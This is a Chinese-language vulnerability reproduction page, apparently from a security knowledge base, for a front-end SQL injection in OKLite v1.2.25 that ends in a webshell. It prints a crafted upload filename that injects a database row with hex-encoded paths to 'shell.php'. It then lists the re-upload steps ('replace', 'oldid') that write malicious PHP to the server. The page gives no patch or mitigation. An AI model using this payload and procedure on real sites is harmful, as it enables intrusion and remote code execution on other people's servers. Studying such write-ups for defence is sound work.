menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right OKLite v1.2.25 SQL注入导致getshell(前台) chevron_right OKLite v1.2.25 SQL注入导致getshell(前台).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    OKLite v1.2.25 SQL注入导致getshell(前台).md
    1.21 KB / 2021-07-15 19:58:12
        OKLite v1.2.25 SQL注入导致getshell(前台)
    ========================================
    
    一、漏洞简介
    ------------
    
    这个漏洞在2017年在PHPOK当中就被畅师傅就被发现了。PHPOK系统被修复了,但是在OKLite当中还存在。
    
    二、漏洞影响
    ------------
    
    OKLite v1.2.25 版本
    
    三、复现过程
    ------------
    
    地址:<http://www.0-sec.org/index.php?id=message>
    
    在线留言处上传一个图片并抓包,把文件名修改为:
    
        1','pf3qm0js3gb2s5f33r7lf14vl3','30'),('1',0x7265732f3230313931302f30342f,'shell.jpg','jpg',0x7265732f3230313931302f30352f7368656c6c2e706870,'1570161575','abc
    
    ![](./resource/OKLitev1.2.25SQL注入导致getshell(前台)/media/rId25.png)
    
    上传成功之后会返回图片的id和保存的路径:
    
    ![](./resource/OKLitev1.2.25SQL注入导致getshell(前台)/media/rId26.png)
    
    再次上传一个图片,把地址中的save改成replace,添加一个参数名为`oldid`,值为图片的id
    + 1。
    
    图片的内容改为恶意的php代码:
    
    ![](./resource/OKLitev1.2.25SQL注入导致getshell(前台)/media/rId27.png)
    
    上传完成之后可在`res\201910\05`目录下生成一个shell.php
    
    ![](./resource/OKLitev1.2.25SQL注入导致getshell(前台)/media/rId28.shtml)
    
    
    links
    file_download